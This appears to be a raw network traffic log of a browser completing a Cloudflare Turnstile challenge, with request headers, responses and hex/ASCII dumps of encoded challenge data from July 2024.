2024-07-03 07:40:38 UTC	1369	IN	Data Raw: 53 66 76 6f 4b 50 6c 33 2b 2b 6f 5a 76 49 77 4d 61 38 78 4a 37 47 69 72 37 45 6f 35 2f 54 7a 61 79 72 73 74 47 61 7a 63 6a 59 74 38 36 62 76 71 4f 30 35 74 79 37 35 39 54 71 33 61 6e 4b 32 37 37 4d 7a 4e 4c 54 34 74 54 30 74 62 62 52 31 73 33 79 30 66 47 38 32 4e 66 75 2b 62 6a 62 39 39 6e 43 78 76 7a 49 2b 52 41 43 7a 4d 76 6e 31 4f 76 31 37 51 48 79 43 4e 54 7a 2b 41 2f 30 46 50 49 4e 46 68 38 67 41 75 4c 61 4b 66 55 74 39 42 73 70 42 75 49 4b 4d 77 77 42 43 41 6b 4c 38 41 49 49 4f 69 6b 55 4f 44 55 32 4c 53 41 4f 46 51 51 65 4a 68 67 30 52 30 77 5a 4b 78 30 6e 4b 69 49 6e 54 45 34 4e 44 67 38 74 54 42 73 53 46 56 4e 58 4c 7a 4d 75 55 55 38 2b 51 54 73 35 4a 79 70 72 50 6c 70 67 54 45 6c 4e 50 56 52 44 55 55 46 58 62 46 56 57 56 7a 5a 59 4e 57 70 59 56 Data Ascii: SfvoKPl3++oZvIwMa8xJ7Gir7Eo5/TzayrstGazcjYt86bvqO05ty759Tq3anK277MzNLT4tT0tbbR1s3y0fG82Nfu+bjb99nCxvzI+RACzMvn1Ov17QHyCNTz+A/0FPINFh8gAuLaKfUt9BspBuIKMwwBCAkL8AIIOikUODU2LSAOFQQeJhg0R0wZKx0nKiInTE4NDg8tTBsSFVNXLzMuUU8+QTs5JyprPlpgTElNPVRDUUFXbFVWVzZYNWpYV
2024-07-03 07:40:38 UTC	1369	IN	Data Raw: 42 6d 6f 47 33 6e 4a 65 73 78 73 69 6a 69 64 47 6f 70 4c 4b 70 69 71 53 55 71 4e 71 70 76 4a 37 59 76 37 4f 75 31 4e 36 79 73 63 61 30 35 75 66 6c 78 63 72 4d 35 36 72 4b 72 4b 37 41 38 4f 66 35 38 38 6e 56 78 50 7a 4b 7a 4d 72 2b 34 65 4c 4f 31 41 54 56 34 39 58 4a 76 65 4c 56 2b 2b 44 6b 2f 65 6e 75 41 4d 33 6a 36 74 6a 6e 37 39 6b 58 42 75 30 4c 49 4f 33 33 34 4e 73 67 38 69 49 49 39 65 41 66 46 67 73 65 39 2b 38 4e 45 50 34 76 42 78 62 78 39 54 55 6c 44 2f 6f 58 47 43 73 76 43 77 37 38 44 78 4d 5a 4f 79 51 56 4e 30 49 66 4b 43 34 72 52 43 59 6c 4c 45 4d 66 4f 45 67 55 55 43 55 72 54 30 6f 33 58 52 68 54 4d 6c 55 30 47 45 64 68 49 6b 46 6d 51 47 6f 39 4c 31 42 4b 4a 43 35 69 4d 45 70 4d 65 47 52 4f 52 54 4a 47 64 6b 6c 6f 56 7a 70 62 59 54 64 54 56 58 Data Ascii: BmoG3nJesxsijidGopLKpiqSUqNqpvJ7Yv7Ou1N6ysca05uflxcrM56rKrK7A8Of588nVxPzKzMr+4eLO1ATV49XJveLV++Dk/enuAM3j6tjn79kXBu0LIO334Nsg8iII9eAfFgse9+8NEP4vBxbx9TUlD/oXGCsvCw78DxMZOyQVN0IfKC4rRCYlLEMfOEgUUCUrT0o3XRhTMlU0GEdhIkFmQGo9L1BKJC5iMEpMeGRORTJGdkloVzpbYTdTVX
2024-07-03 07:40:38 UTC	1369	IN	Data Raw: 6f 35 76 53 6a 70 76 46 70 64 4b 68 70 36 53 69 32 4c 65 76 33 5a 69 35 6e 74 37 50 6e 4c 76 50 78 71 65 70 79 65 6d 6b 6f 37 6e 4f 71 65 7a 4a 35 38 44 4c 36 66 53 30 7a 74 4c 4e 37 65 6a 56 32 64 6e 5a 42 50 6b 41 35 65 54 79 78 39 50 68 39 77 4c 71 2b 67 6e 67 44 74 48 76 43 4d 34 48 44 38 37 6c 45 39 6b 61 37 76 62 72 41 74 30 4c 42 50 33 78 2f 4f 54 6b 2f 53 6b 41 34 69 44 37 36 53 41 4b 37 42 50 78 43 51 77 7a 45 50 45 63 4b 42 55 65 43 42 77 37 49 42 49 56 46 42 73 78 51 44 45 79 52 69 74 43 51 53 56 4f 4a 56 41 73 49 51 34 67 50 7a 63 76 4a 43 55 30 4b 52 41 79 55 6b 73 77 49 30 4a 42 4d 7a 78 47 55 6c 35 63 5a 54 39 44 4a 6d 34 73 59 54 46 66 51 30 78 79 61 47 78 58 56 6c 74 50 58 32 31 70 56 54 74 59 62 48 31 44 50 6f 64 63 68 45 56 6e 62 57 69 Data Ascii: o5vSjpvFpdKhp6Si2Lev3Zi5nt7PnLvPxqepyemko7nOqezJ58DL6fS0ztLN7ejV2dnZBPkA5eTyx9Ph9wLq+gngDtHvCM4HD87lE9ka7vbrAt0LBP3x/OTk/SkA4iD76SAK7BPxCQwzEPEcKBUeCBw7IBIVFBsxQDEyRitCQSVOJVAsIQ4gPzcvJCU0KRAyUkswI0JBMzxGUl5cZT9DJm4sYTFfQ0xyaGxXVltPX21pVTtYbH1DPodchEVnbWi
2024-07-03 07:40:38 UTC	1369	IN	Data Raw: 73 75 30 6b 4b 4b 6f 72 38 32 78 30 4a 47 35 72 62 47 30 34 62 6a 5a 76 37 33 41 74 38 62 56 74 2b 4c 61 35 37 76 41 35 65 76 6f 76 75 54 41 38 4b 79 33 30 73 6e 50 2f 51 4c 74 30 39 2f 52 30 77 44 57 31 51 6f 43 35 75 6f 42 36 2f 6e 34 79 51 41 50 30 75 58 72 46 4f 50 7a 46 68 55 4f 38 4f 72 73 49 4e 72 79 36 77 37 65 37 67 50 37 39 42 6b 48 2b 67 6a 70 4b 77 49 45 4d 41 63 79 38 68 4d 6c 41 2f 55 4c 37 52 66 34 45 41 41 66 4e 2f 6f 41 4d 41 41 2b 53 54 45 71 48 52 77 36 43 45 34 49 41 30 55 2b 50 55 51 75 4c 7a 67 59 4f 6a 68 63 4e 54 6f 2f 53 44 6b 39 58 6a 41 2b 48 53 55 35 53 55 64 4a 51 44 68 50 4f 6c 45 71 4b 45 55 2f 4c 31 35 57 65 55 4e 57 59 30 70 6f 56 59 41 79 54 47 39 5a 55 31 4a 30 63 56 39 78 69 48 75 47 53 34 43 4d 6a 48 36 49 63 47 46 6c Data Ascii: su0kKKor82x0JG5rbG04bjZv73At8bVt+La57vA5evovuTA8Ky30snP/QLt09/R0wDW1QoC5uoB6/n4yQAP0uXrFOPzFhUO8OrsINry6w7e7gP79BkH+gjpKwIEMAcy8hMlA/UL7Rf4EAAfN/oAMAA+STEqHRw6CE4IA0U+PUQuLzgYOjhcNTo/SDk9XjA+HSU5SUdJQDhPOlEqKEU/L15WeUNWY0poVYAyTG9ZU1J0cV9xiHuGS4CMjH6IcGFl

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:40 UTC	487	OUT	GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:40 UTC	375	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 07:40:40 GMT Content-Type: application/json Content-Length: 7 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: 2QCk5lnmg/Vz5+Leh/mNbA==$wGqH3Wj9xaw/mcXiawA9wA== Server: cloudflare CF-RAY: 89d53a8feab28c47-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:40 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:40 UTC	775	OUT	GET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:40 UTC	200	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:40 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 89d53a91aa5c426a-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:40 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4f 00 00 00 1a 08 02 00 00 00 79 15 96 95 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDROyIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:41 UTC	804	OUT	GET /cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:41 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Wed, 03 Jul 2024 07:40:41 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 1 Connection: close
2024-07-03 07:40:41 UTC	2015	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 77 6d 4d 78 4d 4c 68 71 77 4f 34 6d 66 6f 4e 47 4f 77 54 77 55 32 33 70 6f 64 39 4c 75 47 52 62 73 68 37 63 78 68 6c 41 37 6b 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gwmMxMLhqwO4mfoNGOwTwU23pod9LuGRbsh7cxhlA7kcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2024-07-03 07:40:41 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:43 UTC	917	OUT	POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 30351 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: e7db8d6cd2b6574 sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:43 UTC	16384	OUT	Data Raw: 76 5f 38 39 64 35 33 61 37 35 39 65 63 38 30 63 62 34 3d 44 6a 43 48 58 55 47 4c 59 47 2d 62 43 51 49 2d 51 2d 59 48 32 43 63 49 63 78 47 41 73 42 48 52 2d 63 33 73 4e 73 43 6a 47 64 73 24 73 42 4d 48 73 4f 43 73 49 48 47 43 55 78 6b 73 79 78 48 52 6a 55 75 73 66 4f 2d 68 70 71 73 51 59 47 51 73 47 41 31 4f 43 48 6e 57 6d 70 79 73 6e 53 61 38 73 52 37 77 54 73 54 6f 43 73 33 57 2d 38 49 48 41 39 71 73 44 34 6a 6a 75 30 33 73 73 54 31 73 44 59 48 73 44 45 4f 4d 47 79 76 63 47 78 51 54 50 24 6a 73 52 4d 4b 55 73 47 44 76 76 4f 55 61 72 35 77 55 42 53 68 69 62 31 51 49 2d 44 4d 5a 44 4d 73 44 62 61 73 24 65 37 4e 7a 42 32 61 73 54 53 42 47 76 75 25 32 62 75 4b 32 50 54 48 62 4f 69 48 45 6a 4a 4f 45 42 33 71 42 50 7a 50 53 79 30 79 49 69 78 5a 38 55 38 79 51 Data Ascii: v_89d53a759ec80cb4=DjCHXUGLYG-bCQI-Q-YH2CcIcxGAsBHR-c3sNsCjGds$sBMHsOCsIHGCUxksyxHRjUusfO-hpqsQYGQsGA1OCHnWmpysnSa8sR7wTsToCs3W-8IHA9qsD4jju03ssT1sDYHsDEOMGyvcGxQTP$jsRMKUsGDvvOUar5wUBShib1QI-DMZDMsDbas$e7NzB2asTSBGvu%2buK2PTHbOiHEjJOEB3qBPzPSy0yIixZ8U8yQ
2024-07-03 07:40:43 UTC	13967	OUT	Data Raw: 48 63 61 73 78 47 46 73 63 48 61 61 73 75 55 6a 63 69 73 4b 4d 62 4b 6e 48 63 74 73 4c 73 5a 73 24 4d 73 65 2b 2d 48 51 43 55 64 73 69 48 78 2b 79 33 73 67 48 51 73 55 67 73 47 62 24 59 55 78 73 53 48 33 2d 63 75 73 79 73 42 72 68 47 48 55 48 33 2d 55 6f 33 68 73 33 69 34 4a 73 63 48 44 61 63 59 73 6c 48 47 35 73 30 73 55 48 78 49 73 4d 73 65 61 42 48 55 4a 73 74 2d 54 48 63 2b 73 70 61 24 73 63 2d 73 77 4c 52 43 55 67 73 4c 73 52 43 73 33 73 45 73 73 75 47 70 43 4f 4d 24 73 63 71 4d 47 48 52 43 73 30 73 75 73 24 73 73 77 6a 54 69 6e 62 47 4c 73 69 62 54 78 47 46 73 74 56 71 4f 37 2b 73 6c 48 33 61 24 54 73 71 48 73 59 55 2d 73 55 2d 54 49 43 6e 73 64 73 52 61 47 65 48 6f 73 61 73 63 31 65 43 52 43 47 72 73 78 59 78 6a 55 70 73 6a 48 51 6b 47 46 73 6c 48 Data Ascii: HcasxGFscHaasuUjcisKMbKnHctsLsZs$Mse+-HQCUdsiHx+y3sgHQsUgsGb$YUxsSH3-cusysBrhGHUH3-Uo3hs3i4JscHDacYslHG5s0sUHxIsMseaBHUJst-THc+spa$sc-swLRCUgsLsRCs3sEssuGpCOM$scqMGHRCs0sus$sswjTinbGLsibTxGFstVqO7+slH3a$TsqHsYU-sU-TICnsdsRaGeHosasc1eCRCGrsxYxjUpsjHQkGFslH
2024-07-03 07:40:43 UTC	322	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:43 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 23440 Connection: close cf-chl-gen: YCsawPQ1gtEXoynMCjj7SrXBLvEo2pkiGEpZAWUop0AY3y/yQOQEdeqjSZWpc5pz$QhtwPs6ZmxAd4DMqvTMwvA== Server: cloudflare CF-RAY: 89d53aa439d2c470-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:43 UTC	1047	IN	Data Raw: 78 72 66 41 67 38 71 35 7a 59 61 4f 76 4d 32 49 6e 5a 32 6d 6a 71 6e 57 6d 4a 6a 43 71 62 6d 63 78 71 32 67 32 73 2b 78 34 38 54 43 70 65 48 57 32 61 58 69 32 38 53 6d 76 62 2f 4c 7a 2f 58 50 73 38 61 71 78 74 54 57 39 72 72 58 31 2f 48 35 33 75 54 77 2f 63 62 7a 38 74 76 47 43 41 63 4d 35 67 73 4a 36 50 77 45 44 38 76 6a 47 4e 66 35 32 76 41 57 48 77 44 58 41 52 44 30 45 78 2f 6a 39 78 6a 34 49 76 76 30 49 78 66 74 4a 6a 49 66 37 53 30 31 38 54 51 68 44 2f 51 62 4d 6a 59 78 4b 76 6f 2f 41 42 6f 32 50 2f 63 43 50 51 64 48 43 68 34 39 53 30 63 50 4f 54 46 4d 54 53 74 53 54 31 41 72 56 45 31 54 4e 43 68 59 53 46 46 63 56 56 77 65 51 56 31 66 58 56 70 68 62 45 45 6c 58 55 41 2f 53 30 64 4b 5a 7a 56 78 51 45 74 35 4d 58 56 2b 57 6e 39 5a 65 6c 61 41 58 47 39 Data Ascii: xrfAg8q5zYaOvM2InZ2mjqnWmJjCqbmcxq2g2s+x48TCpeHW2aXi28Smvb/Lz/XPs8aqxtTW9rrX1/H53uTw/cbz8tvGCAcM5gsJ6PwED8vjGNf52vAWHwDXARD0Ex/j9xj4Ivv0IxftJjIf7S018TQhD/QbMjYxKvo/ABo2P/cCPQdHCh49S0cPOTFMTStST1ArVE1TNChYSFFcVVweQV1fXVphbEElXUA/S0dKZzVxQEt5MXV+Wn9ZelaAXG9
2024-07-03 07:40:43 UTC	1369	IN	Data Raw: 52 7a 72 65 36 79 39 6a 61 71 63 71 66 74 4d 33 6a 70 62 6d 67 6f 62 72 61 78 71 75 6f 33 73 48 74 36 4d 2b 79 38 37 58 78 73 50 62 4f 39 37 6e 56 7a 72 4b 2b 77 74 54 77 41 2f 4c 6a 32 4d 6e 44 43 50 63 43 45 41 6e 4a 35 73 6e 68 38 73 76 6c 34 50 58 77 42 76 76 56 35 52 4d 62 47 4e 33 73 2b 78 7a 6a 46 77 41 69 2b 52 76 71 4b 76 34 67 2b 79 63 44 4c 2b 34 53 41 79 67 45 4f 41 77 73 43 44 4d 30 44 50 34 42 46 44 41 37 4c 67 5a 43 47 45 63 64 52 55 4d 65 47 42 6f 75 50 31 42 4c 48 41 31 51 46 6b 67 74 4c 31 59 77 53 53 34 73 46 7a 4d 67 51 68 39 52 51 32 42 48 4e 44 34 30 53 53 6c 5a 4b 54 31 4e 59 30 52 4b 4e 58 4a 6f 61 6c 5a 70 56 6e 64 71 56 56 70 38 59 58 70 2f 55 34 4e 46 58 47 4f 41 5a 31 65 43 54 56 35 68 57 56 39 72 54 6d 4e 4d 62 56 39 71 59 70 Data Ascii: Rzre6y9jaqcqftM3jpbmgobraxquo3sHt6M+y87XxsPbO97nVzrK+wtTwA/Lj2MnDCPcCEAnJ5snh8svl4PXwBvvV5RMbGN3s+xzjFwAi+RvqKv4g+ycDL+4SAygEOAwsCDM0DP4BFDA7LgZCGEcdRUMeGBouP1BLHA1QFkgtL1YwSS4sFzMgQh9RQ2BHND40SSlZKT1NY0RKNXJoalZpVndqVVp8YXp/U4NFXGOAZ1eCTV5hWV9rTmNMbV9qYp
2024-07-03 07:40:43 UTC	1369	IN	Data Raw: 79 72 44 58 73 4a 76 57 33 37 66 57 70 4e 2f 6d 31 63 2f 6d 72 50 44 6f 33 66 43 77 78 63 58 4b 32 65 76 4c 31 64 58 4a 76 66 7a 41 33 74 7a 73 34 4e 62 35 30 74 4c 53 32 4d 7a 36 33 51 58 48 30 65 58 66 38 75 6a 73 43 77 6a 36 38 4f 67 54 44 68 34 58 37 52 77 43 32 51 59 53 48 52 4c 68 41 77 59 4a 39 50 30 48 43 75 6b 52 36 65 2f 77 41 53 4c 30 37 2b 73 55 47 69 73 61 43 77 34 4c 4d 78 4d 2f 52 6b 63 6e 52 42 73 35 4b 69 30 47 47 53 45 61 4c 6b 34 65 53 46 4a 50 55 43 64 4a 52 78 5a 49 4e 68 6f 70 46 6a 73 32 54 7a 68 53 49 6c 64 6c 53 52 77 69 61 6b 49 32 4f 79 30 6e 58 45 4e 69 56 55 78 31 62 6b 31 51 52 6d 6b 76 64 6b 6c 6f 63 6c 52 4e 62 48 5a 58 68 33 42 36 57 33 78 2f 67 33 78 42 55 46 70 4a 54 6d 35 65 62 5a 69 53 6a 32 70 6d 6c 6d 57 65 61 47 68 Data Ascii: yrDXsJvW37fWpN/m1c/mrPDo3fCwxcXK2evL1dXJvfzA3tzs4Nb50tLS2Mz63QXH0eXf8ujsCwj68OgTDh4X7RwC2QYSHRLhAwYJ9P0HCukR6e/wASL07+sUGisaCw4LMxM/RkcnRBs5Ki0GGSEaLk4eSFJPUCdJRxZINhopFjs2TzhSIldlSRwiakI2Oy0nXENiVUx1bk1QRmkvdkloclRNbHZXh3B6W3x/g3xBUFpJTm5ebZiSj2pmlmWeaGh
2024-07-03 07:40:43 UTC	1369	IN	Data Raw: 64 65 78 74 4f 44 6d 71 62 6d 75 76 63 43 72 7a 4d 72 6c 73 36 6e 67 31 4f 37 71 30 38 66 53 37 50 58 2b 41 2f 76 42 42 74 33 34 2b 38 59 49 36 4e 6e 36 2f 41 62 67 7a 66 44 65 7a 2f 30 4c 36 67 48 73 45 39 76 77 38 51 6e 39 46 78 37 68 2f 76 58 76 41 76 77 6a 34 67 73 61 48 2b 30 6c 37 75 6b 52 47 78 4d 57 38 76 34 6e 37 76 55 33 4d 44 67 54 2b 7a 41 70 44 53 34 43 4d 51 45 48 42 44 45 58 4a 6a 51 74 47 7a 73 34 43 78 34 65 50 41 35 58 53 69 30 52 45 79 68 57 4d 56 64 58 54 54 67 34 4d 56 34 7a 49 6b 67 33 4a 42 78 54 51 53 70 6e 59 53 4a 69 5a 32 39 6c 59 54 52 6c 4e 30 6c 4b 56 6d 55 38 5a 6a 68 32 66 30 36 43 57 49 4e 54 59 48 4a 6e 58 6d 57 43 61 56 75 50 68 6f 4e 51 67 32 79 54 61 6e 43 43 6b 57 35 30 66 49 31 72 6e 35 61 66 64 6f 74 6a 6b 6e 4b 5a Data Ascii: dextODmqbmuvcCrzMrls6ng1O7q08fS7PX+A/vBBt34+8YI6Nn6/AbgzfDez/0L6gHsE9vw8Qn9Fx7h/vXvAvwj4gsaH+0l7ukRGxMW8v4n7vU3MDgT+zApDS4CMQEHBDEXJjQtGzs4Cx4ePA5XSi0REyhWMVdXTTg4MV4zIkg3JBxTQSpnYSJiZ29lYTRlN0lKVmU8Zjh2f06CWINTYHJnXmWCaVuPhoNQg2yTanCCkW50fI1rn5afdotjknKZ
2024-07-03 07:40:43 UTC	1369	IN	Data Raw: 6a 4e 35 2b 6e 45 71 76 4c 4a 78 64 50 4b 71 38 57 31 79 66 76 4b 33 62 2f 4a 7a 2f 6e 5a 75 77 48 61 34 51 72 65 35 51 34 43 2b 42 48 6f 45 75 62 51 7a 78 4c 79 43 2b 4c 35 35 42 51 4c 44 75 6b 58 48 39 6a 64 32 78 49 64 2f 52 48 37 45 2b 4d 4e 48 51 63 68 34 51 4d 44 37 79 38 46 45 6a 45 5a 4a 6a 59 45 4d 6a 49 66 48 43 73 30 4c 79 4d 69 4e 51 4d 53 52 79 5a 48 41 77 67 38 44 55 34 65 50 6b 39 4b 56 45 42 45 44 79 63 4c 54 52 5a 4b 4d 30 35 66 50 78 30 32 4e 78 74 51 4f 44 55 35 53 55 70 67 5a 44 64 6c 57 31 78 67 50 54 31 6c 4d 7a 4a 48 4e 48 70 50 65 33 5a 39 54 6b 70 58 4d 33 31 56 57 46 6c 55 52 49 52 45 68 31 31 6f 66 49 32 4a 66 6d 53 4c 69 6e 79 44 68 46 64 68 55 56 64 6c 6c 58 75 4a 69 57 70 73 56 4a 56 62 65 5a 64 6d 64 59 47 67 61 71 6d 57 6d Data Ascii: jN5+nEqvLJxdPKq8W1yfvK3b/Jz/nZuwHa4Qre5Q4C+BHoEubQzxLyC+L55BQLDukXH9jd2xId/RH7E+MNHQch4QMD7y8FEjEZJjYEMjIfHCs0LyMiNQMSRyZHAwg8DU4ePk9KVEBEDycLTRZKM05fPx02NxtQODU5SUpgZDdlW1xgPT1lMzJHNHpPe3Z9TkpXM31VWFlURIREh11ofI2JfmSLinyDhFdhUVdllXuJiWpsVJVbeZdmdYGgaqmWm
2024-07-03 07:40:43 UTC	1369	IN	Data Raw: 78 71 4f 44 75 78 61 7a 77 37 4d 72 48 31 76 57 39 74 50 7a 35 30 74 2f 6a 35 4d 54 35 39 65 6e 4a 2f 65 34 48 33 4d 77 4e 44 63 34 42 79 51 6f 4e 45 78 4c 38 45 67 6a 33 2f 65 77 62 49 2b 2f 39 39 69 6a 2b 47 43 45 59 43 2b 62 70 4b 2f 41 4f 44 77 54 77 45 43 6b 6e 41 77 2f 79 42 50 51 36 4b 77 77 4d 49 6a 30 52 50 41 38 50 53 52 56 4c 4e 45 55 6c 53 77 34 4a 44 67 6b 37 55 53 52 56 55 56 55 69 56 6c 52 56 4e 6c 31 5a 58 42 6b 35 55 56 68 66 55 56 38 77 4e 53 51 38 4f 43 70 4b 59 6b 46 4c 54 6d 5a 46 54 32 35 6d 65 56 52 34 62 46 42 58 4f 32 74 38 66 59 46 6a 66 6d 53 43 67 6c 6d 49 53 6c 69 48 54 56 2b 50 53 49 78 70 61 31 52 6a 6a 34 39 70 6b 33 64 37 56 33 4a 36 55 5a 74 5a 6b 34 4e 31 59 35 4b 50 68 48 65 48 6e 49 6c 2b 72 61 43 61 71 71 57 6e 74 58 Data Ascii: xqODuxazw7MrH1vW9tPz50t/j5MT59enJ/e4H3MwNDc4ByQoNExL8Egj3/ewbI+/99ij+GCEYC+bpK/AODwTwECknAw/yBPQ6KwwMIj0RPA8PSRVLNEUlSw4JDgk7USRVUVUiVlRVNl1ZXBk5UVhfUV8wNSQ8OCpKYkFLTmZFT25meVR4bFBXO2t8fYFjfmSCglmISliHTV+PSIxpa1Rjj49pk3d7V3J6UZtZk4N1Y5KPhHeHnIl+raCaqqWntX
2024-07-03 07:40:43 UTC	1369	IN	Data Raw: 36 4e 33 79 30 50 4c 32 75 39 54 6b 37 76 6d 2f 38 75 66 43 41 2f 76 74 32 38 2f 38 37 75 2f 74 44 77 37 54 45 42 67 55 37 4e 73 5a 2f 74 73 59 46 42 76 7a 49 66 67 63 42 51 55 54 43 76 67 58 47 67 33 6e 34 53 41 73 4b 75 38 55 45 2b 34 30 38 78 66 79 4a 78 6f 65 39 78 30 70 4b 68 51 41 51 79 59 6c 49 54 6b 71 4b 53 55 39 4e 30 49 49 4f 7a 41 4c 53 30 51 32 4a 42 68 46 4e 7a 67 32 56 31 59 63 57 47 42 63 4e 53 52 68 52 79 52 67 58 47 4d 38 61 55 46 6b 54 55 31 62 55 6b 46 66 59 6c 51 77 4b 6d 68 30 63 6a 68 63 57 7a 64 37 64 6d 46 68 55 6b 42 6a 50 33 4e 6d 61 6b 52 70 64 58 5a 67 54 49 39 79 63 57 32 48 63 6f 36 55 6c 35 43 44 5a 6f 61 56 57 46 6d 4f 6c 6e 47 43 6f 70 78 35 6c 4b 47 67 6b 34 61 68 70 57 69 4f 6a 4a 71 64 73 36 65 6f 72 6d 71 7a 72 6e 52 Data Ascii: 6N3y0PL2u9Tk7vm/8ufCA/vt28/87u/tDw7TEBgU7NsZ/tsYFBvzIfgcBQUTCvgXGg3n4SAsKu8UE+408xfyJxoe9x0pKhQAQyYlITkqKSU9N0IIOzALS0Q2JBhFNzg2V1YcWGBcNSRhRyRgXGM8aUFkTU1bUkFfYlQwKmh0cjhcWzd7dmFhUkBjP3NmakRpdXZgTI9ycW2Hco6Ul5CDZoaVWFmOlnGCopx5lKGgk4ahpWiOjJqds6eormqzrnR
